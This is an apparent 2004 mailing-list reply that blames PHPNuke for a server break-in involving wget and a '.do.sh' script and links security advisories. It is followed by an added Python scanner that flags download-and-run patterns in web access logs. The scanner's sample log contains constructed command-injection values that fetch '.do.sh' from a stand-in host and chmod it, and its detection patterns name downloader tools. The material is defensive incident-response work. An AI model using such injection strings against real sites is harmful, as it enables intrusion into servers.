Hi Mátyás,

On Tue, 13.01.2004 at 17:33, Mátyás Tibor wrote:
> I have got in /cgi-bin/ directory:
> -neomail (1.26)
> -openwebmail (2.30)
> -SuSE things
> -sanecgi
> but nothing else.
> And I have Phpnuke 6.9 (?? PHP ??)

Did you check PHPNuke? I wouldn't trust this piece of software further than I can throw my Gateway bigtower case ;-) PostNuke and PHPNuke are known to be notoriously weak when it comes to security.

> Ok, somebody could use wget, but what about the .do.sh --> how was it possible to execute it?

Without knowing anything else I'd suspect PHPNuke to be the open door. It may contain a bug that allows passing executable content as a parameter. This has been the case in the past very often, as the developers of those two projects don't seem to be too concerned about evaluating the parameters at runtime. Have a look at this:

http://www.gulftech.org/01032004.php
or
http://www.securitytracker.com/alerts/2003/Dec/1008562.html

I really wouldn't use PostNuke or PHPNuke, as there seemingly never has been any code audit, since new weaknesses based on poor programming are discovered regularly.

Just my 0.02 euro ;-)

Tobias
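
One way to check which script was the open door, as an added example that is not part of the original mails: a Python scan of web server access-log lines for request parameters that carry a download-and-run pattern such as the wget and .do.sh mentioned above. It assumes Apache common log format; the log entries, script names and parameter names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Client, timestamp, request target and status of an Apache common-log entry.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+)[^"]*" (\d{3})')
# Indicators of a fetch-and-run attempt inside a decoded parameter value.
INDICATORS = {
    "downloader": re.compile(r'\b(?:wget|curl|lynx|fetch)\b', re.I),
    "shell-meta": re.compile(r'[;|`]|\$\(|&&'),
    "script-file": re.compile(r'\.sh\b', re.I),
    "remote-url": re.compile(r'(?:https?|ftp)://', re.I),
}

def decode(value, rounds=2):
    """Undo extra layers of percent-encoding (%2520 -> %20 -> space)."""
    for _ in range(rounds):
        value, prev = unquote_plus(value), value
        if value == prev:
            break
    return value

def suspicious_requests(lines, min_hits=2):
    """Return (client, time, script, parameter, indicators) per flagged parameter."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, when, target, _status = m.groups()
        url = urlsplit(target)
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            value = decode(raw)  # parse_qsl has already decoded one layer
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(value))
            if len(hits) >= min_hits:  # one indicator alone (a plain URL) is too noisy
                findings.append((client, when, url.path, name, hits))
    return findings

# Constructed sample entries: documentation addresses, hypothetical scripts and parameters.
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jan/2004:03:12:44 +0100] "GET /modules.php?name=News&sid=12 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [13/Jan/2004:03:14:02 +0100] "GET /modules.php?name=Example&page=x%3Bwget%20http%3A%2F%2Fexample.invalid%2F.do.sh HTTP/1.0" 200 311',
    '198.51.100.7 - - [13/Jan/2004:03:14:09 +0100] "GET /cgi-bin/example.pl?action=view%253Bchmod%2520755%2520.do.sh HTTP/1.0" 200 0',
    '192.0.2.33 - - [13/Jan/2004:03:20:51 +0100] "GET /modules.php?name=Links&url=http%3A%2F%2Fexample.org%2F HTTP/1.0" 200 840',
]

if __name__ == "__main__":
    for finding in suspicious_requests(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so parameters sent in a POST body will not show up in this scan.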